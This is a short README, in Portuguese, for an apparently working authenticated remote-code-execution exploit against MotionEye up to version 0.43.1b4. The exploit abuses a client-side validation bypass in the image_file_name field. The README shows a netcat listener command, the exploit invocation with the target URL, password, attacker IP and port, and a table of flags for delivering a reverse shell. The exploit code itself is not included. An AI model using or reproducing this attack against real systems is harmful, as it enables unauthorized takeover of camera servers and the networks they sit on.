
Exploit de RCE autenticado para MotionEye <= 0.43.1b4 via bypass da validação no lado do cliente no campo image_file_name. Inclui entrega de payload de reverse shell.
RCE autenticado no MotionEye <= 0.43.1b4 através de bypass de validação do lado do cliente no campo image_file_name.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| Flag | Descrição |
|---|---|
-t | Host/URL alvo (padrão: porta 8765) |
-u | Nome de usuário (padrão: admin) |
-p | Senha - mesmo valor que você digita na interface gráfica / encontrado em motion.conf |
-lh | Seu IP (atacante) |
-lp | Porta de escuta |
--camera-id | ID da câmera (detectado automaticamente se omitido) |